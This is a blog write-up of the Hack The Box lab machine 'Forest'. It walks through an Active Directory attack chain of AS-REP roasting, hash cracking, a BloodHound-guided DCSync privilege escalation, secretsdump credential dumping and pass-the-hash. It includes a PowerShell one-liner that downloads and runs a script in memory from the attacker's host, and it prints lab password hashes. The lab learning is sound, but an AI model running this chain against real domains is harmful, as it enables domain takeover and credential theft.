---
title: "HTB: Forest"
date: 2021-07-10
classes: wide
categories:
  - Hackthebox
tag:
  - rpc
  - AS-REP roasting
  - dcsync attack 
  - bloodhound
  - sharphound
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/forest/forest.jpeg" alt="">

# Summary 

Forest was a fun active directory machine from hackthebox that revolved around getting users for the machine via rpcclient and with those users you perform AS-REP roasting to get the hash for the SVC-Alfresco user, you then crack this hash and  get a shell on the machine via evil-winrm. The priv esc to administrator took me the most amount of time on this machine because it was a little complex and took me a fair few minutes to actually understand how it works but it revolved around a dsync attack on the domain controller

# Recon
```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $cat nmap-scan 
# Nmap 7.80 scan initiated Thu Sep 24 10:45:27 2020 as: nmap -A -oN nmap-scan 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.058s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-24 09:52:40Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/24%Time=5F6C6AD3%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-09-24T02:54:59-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-24T09:55:01
|_  start_date: 2020-09-24T09:39:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 24 10:50:22 2020 -- 1 IP address (1 host up) scanned in 295.32 seconds
```

And all port scan

```
└──╼ $cat all-ports 
# Nmap 7.91 scan initiated Sun Jul  4 09:03:30 2021 as: nmap -p- -oN all-ports --min-rate 10000 10.10.10.161
Nmap scan report for forest.htb (10.10.10.161)
Host is up (0.018s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49684/tcp open  unknown
49706/tcp open  unknown
49929/tcp open  unknown

# Nmap done at Sun Jul  4 09:03:38 2021 -- 1 IP address (1 host up) scanned in 8.33 seconds

```

Straight away nmap scripts tell me that the domain of this machine is htb.local so I add that to my /etc/hosts file as well a forest.htb and forest.htb.local

# Enumeration of Services

## DNS Port 53
```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $nslookup
> server 10.10.10.161
Default server: 10.10.10.161
Address: 10.10.10.161#53
> 10.10.10.161
;; connection timed out; no servers could be reached

> 127.0.0.1
1.0.0.127.in-addr.arpa	name = localhost.
> forest.htb
;; connection timed out; no servers could be reached

> htb.local
Server:		10.10.10.161
Address:	10.10.10.161#53

Name:	htb.local
Address: 10.10.10.161
> exit
```
and also attempt a dns zone transfer 
```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $dig axfr htb.local @10.10.10.161

; <<>> DiG 9.16.15-Debian <<>> axfr htb.local @10.10.10.161
;; global options: +cmd
; Transfer failed.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $dig axfr forest.htb @10.10.10.161

; <<>> DiG 9.16.15-Debian <<>> axfr forest.htb @10.10.10.161
;; global options: +cmd
; Transfer failed.
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $dig axfr forest.htb.local @10.10.10.161

; <<>> DiG 9.16.15-Debian <<>> axfr forest.htb.local @10.10.10.161
;; global options: +cmd
; Transfer failed.
```

## MSRPC Port 135

I was able to connect via null authentication and get a list of domain users on the machine

```
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 
```

I was also able to see that the group domain admins only had one user in it and that was the administrator account and also that the description field for all the accounts was null

```
rpcclient $> querydispinfo
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA	Name: (null)	Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator	Name: Administrator	Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy	Name: Andy Hislip	Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount	Name: (null)	Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1	Name: HealthMailbox-EXCH01-010	Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e	Name: HealthMailbox-EXCH01-003	Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678	Name: HealthMailbox-EXCH01-005	Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e	Name: HealthMailbox-EXCH01-009	Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781	Name: HealthMailbox-EXCH01-006	Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d	Name: HealthMailbox-EXCH01-004	Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64	Name: HealthMailbox-EXCH01-008	Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9	Name: HealthMailbox-EXCH01-002	Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722	Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013	Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad	Name: HealthMailbox-EXCH01-001	Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238	Name: HealthMailbox-EXCH01-007	Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda	Name: Lucinda Berger	Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark	Name: Mark Brandt	Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi	Name: Santi Rodriguez	Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien	Name: Sebastien Caron	Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb	Name: Microsoft Exchange Migration	Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb	Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}	Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb	Name: Microsoft Exchange Approval Assistant	Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18	Name: Discovery Search Mailbox	Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a	Name: Microsoft Exchange	Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb	Name: E4E Encryption Store - Active	Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549	Name: Microsoft Exchange Federation Mailbox	Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b	Name: Microsoft Exchange	Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b	Name: Microsoft Exchange	Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco	Name: svc-alfresco	Desc: (null)
rpcclient $> querygroup 0x200
	Group Name:	Domain Admins
	Description:	Designated administrators of the domain
	Group Attribute:7
	Num Members:1
rpcclient $> querygroupmem 0x200
	rid:[0x1f4] attr:[0x7]
```

I was then able to do awk commands so that I could just have a list of the domain users on the machine

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $cat abc.txt | awk -F[ {'print $2'} | awk -F] {'print $1'}
sebastien
lucinda
svc-alfresco
andy
mark
santi
```

## LDAP 389

I was able to get a list of user information meaning that annoynmous ldap was enabled but there was no useful information I could find

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]                                                     
└──╼ $/opt/windapsearch-linux-amd64  --domain htb.local --dc 10.10.10.161 -m users
```

## SMB 445

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $smbclient -L //10.10.10.161/
Enter WORKGROUP\purplerabbit's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $smbmap -H $ip
[+] IP: 10.10.10.161:445        Name: forest.htb                                        
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $
```

# Shell as SVC_alfresco

AS-REP roasting is an attack  that allows retrieving password hashes for users that have `Do not require Kerberos preauthentication` property selected. Its very similar to kerberoasting except that you don't need to have a valid domain account to perform this attack. The GetNPUsers.py script from impacket works fine for this attack

I actually got a little stuck on this part because I entered in the wrong domain name forest.htb not htb.local which was the one shown in the ldap script on nmap

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $GetNPUsers.py forest.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.161 -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
[-] Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
```

Inputting the correct domain name htb.local gave me the hash of svc_alfresco user 

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -output hashes.asreproast -request
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2021-07-04 09:02:34.185253  2021-07-04 07:34:33.846212  0x410200 



┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $cat hashes.asreproast 
$krb5asrep$23$svc-alfresco@HTB.LOCAL:08fe2ff3157d9cdb4e5b1c9cbdaf81c6$2779b8c56079697b4ab0d138d42db1e89fd5755eef96617b0310ee2329ae8658d978f87098ed3151e2b753b5eff442b47cc0812fca1cb31eeef4cbaacf2cdd86950bb0e4d5511eb26cf7d20b8abeb384c2f9aac6f1d99f108bf8e34abc77091df38ef10195e398116964ae4b80d87f15fb53c7cdd7942afff3f6b0e6057b33b28a148b922a90b85699b2fa106e970e6223c5bac84fa947b964037c3953df9d71f7af2523896dd01fca1da6beb70f487ea33898219ef0261a6cf2a930890870fa65b09055834de14def6f3d748e03c5e54551a1181d42c1f6b1cda7e2f82b9313bd991f9cd188
```

Cracking the hash with john:

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $john hashes.asreproast --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)                                                                                                                                       1g 0:00:00:05 DONE (2021-07-04 08:57) 0.1782g/s 728299p/s 728299c/s 728299C/s s4553592..s3r2s1                                                                                                Use the "--show" option to display all of the cracked passwords reliably                                                                                                                      
Session completed                                                                              
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $john hashes.asreproast --show             
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice                                                   
                                                                                               
1 password hash cracked, 0 left 
```

and then cracking the password with hashcat

```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]                                                     
└──╼ $hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...    
                                                                                               
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz, 3300/3364 MB (1024 MB allocatable), 4MCU
                                               
Minimum password length supported by kernel: 0                                                 
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1                                  
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 134 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$svc-alfresco@HTB.LOCAL:08fe2ff3157d9cdb4e5b1c9cbdaf81c6$2779b8c56079697b4ab0d138d42db1e89fd5755eef96617b0310ee2329ae8658d978f87098ed3151e2b753b5eff442b47cc0812fca1cb31eeef4cbaacf2cdd86950bb0e4d5511eb26cf7d20b8abeb384c2f9aac6f1d99f108bf8e34abc77091df38ef10195e398116964ae4b80d87f15fb53c7cdd7942afff3f6b0e6057b33b28a148b922a90b85699b2fa106e970e6223c5bac84fa947b964037c3953df9d71f7af2523896dd01fca1da6beb70f487ea33898219ef0261a6cf2a930890870fa65b09055834de14def6f3d748e03c5e54551a1181d42c1f6b1cda7e2f82b9313bd991f9cd188:s3rvice
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:08fe2ff3157d9c...9cd188
Time.Started.....: Sun Jul  4 08:57:58 2021 (5 secs)
Time.Estimated...: Sun Jul  4 08:58:03 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   949.2 kH/s (8.19ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096000/14344385 (28.55%)
Rejected.........: 0/4096000 (0.00%)
Restore.Point....: 4079616/14344385 (28.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: s9039554h -> s/nd/0s

Started: Sun Jul  4 08:57:55 2021
Stopped: Sun Jul  4 08:58:04 2021
```

the password was shown as s3rvice 

I checked to see if I could see anything in smb and I had read access to IPC$ NETLOGON and SYSVOL but first I wanted to see if I could use evil-winrm to get a powershell into the machine and I could 

```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> 
```
(for some reason my colours are messed up in my terminal and I have no idea how to fix it, if you know please send me a message)
I then could get user.txt in the Desktop directory
```
c[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco> cd Desktop
dir
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Desktop> dir


    Directory: C:\Users\svc-alfresco\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/23/2019   2:16 PM             32 user.txt

```

# SVC-alfresco => Administrator 

This priv esc was complex in my opinion. So because its a dc we are attempting to priv esc to we will use bloodhound to give an overview of permissions within active directory 

I started an smb server on my kali machine to host the SharpHound.exe file using 

```
sudo systemctl start smbd
```

Next I downloaded this file onto the windows machine and ran it and then downloaded the resulting zip file like so

```
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> copy \\10.10.16.91\test\priv-esc-scripts\windows\SharpHound.exe
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> dir      
                                                                                                                                                                                              
                                                                                               
    Directory: C:\Users\svc-alfresco\Documents

                                                                                                                                                                                              
Mode                LastWriteTime         Length Name                                                                                                                                         
----                -------------         ------ ----
-a----         7/4/2021   1:09 AM         833024 SharpHound.exe


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> .\SharpHound.exe
----------------------------------------------
Initializing SharpHound at 1:36 AM on 7/4/2021
----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=htb,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 21 MB RAM
Status: 123 objects finished (+123 61.5)/s -- Using 28 MB RAM
Enumeration finished in 00:00:02.6787723
Compressing data to .\20210704013633_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 1:36 AM on 7/4/2021! Happy Graphing!

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> dir


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/4/2021   1:36 AM          15180 20210704013633_BloodHound.zip
-a----         7/4/2021   1:36 AM          23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----         7/4/2021   1:09 AM         833024 SharpHound.exe


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> download 20210704013633_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20210704013633_BloodHound.zip to 20210704013633_BloodHound.zip

                                                             
Info: Download successful!

```

I used the download module from evil-winrm. I could have used my smb server to do so, but it just seemed easier to use the download module.

Next I started neo4j on my kali machine using
```
┌─[✗]─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $sudo neo4j console
```

Then I ran bloodhound and input the neo4j password which is default neo4j:neo4j

Note:
That I tried using bloodhound-python, but it gave me less json files than the sharphound.exe file so I went with the zip file and imported that into bloodhound

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/forest/1.png" alt="">

Looking within bloodhound and choosing "FInd shortest path to Domain Admins" shows this graph

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/forest/2.png" alt="">

After much puzzling over this data and looking through one or two writeups for this machine to understand how this priv esc works. Basically svc_alfresco is a member of the group service accounts and this group is a member of IT privileged IT admin which is a member of Account Operators. The account operators group has generic all permissions to Exchange Windows Permissions and this group has writeDacl permissions on the domain htb.local. Which allows members to modify the DACL	(Discretionary access control list) on the domain which we can abuse by granting ourselves dcsync privs which will then allow us to dump the hashes of the domain. Then with the hashes of the domain we can use pass the hash to get a winrm shell into the machine

So first we need to assign ourselves to the Exchange Windows  Permissions group which we can do because we are part of account operators group which has generic all permissions to Exchange Windows Permissions Group

The example shown in bloodhound when you right click on Generic All shows domain admins.
So the command to give ourselves Exchange Windows Permissions is 

```
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> net group 'Exchange Windows Permissions'
Group name     Exchange Windows Permissions
Comment        This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.

Members

-------------------------------------------------------------------------------
svc-alfresco
The command completed successfully.
```
Next I hosted powerview on my local kali machine using python simple http server and used a powershell one liner to import it directly to memory
```
┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest/www]
└──╼ $sudo python -m SimpleHTTPServer 80
```

and then from evil-winrm session

```
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.16.91/PowerView.ps1')
```

Now that we are apart of the Exchange Windows Permissions group we can give ourselves DCSync permissionns. This part took me a little bit of time because -target-domain htb.local didn't work and I kept getting a frozen shell and its only after I realized from the documentation of powersploit https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainObjectAcl/ that I didn't need to specify this, as it would default to the domain name of the machine

So I followed the suggestions on bloodhound help tab on how to abuse this misconfiguration changing the username to svc_alfresco and the domain to htb

```
0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $SecPassword)
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity svc-alfresco  -Rights DCSync
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-alfresco\Documents> 
```

Next I used secretsdump.py from impacket to attempt to extract the hashes of the domain users and it worked!

```
─[purplerabbit@kali]─[~/Documents/htb/ad/forest]                                                                                                                                                    
└──╼ $secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.161                                                                                                                              
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                       
                                                                                                                                                                                              
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied                                                                                                            
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                  
[*] Using the DRSUAPI method to get NTDS.DIT secrets                                                                                                                                          
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::                       
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                 
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::                
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                                                       
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
snipped
```

All I needed to do now was passthehash and so I used evil-winrm to remote in as administrator 
```

┌─[purplerabbit@kali]─[~/Documents/htb/ad/forest]
└──╼ $evil-winrm -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i 10.10.10.161

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> whoami
htb\administrator
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> 
```

That's it for the forest machine from hackthebox!




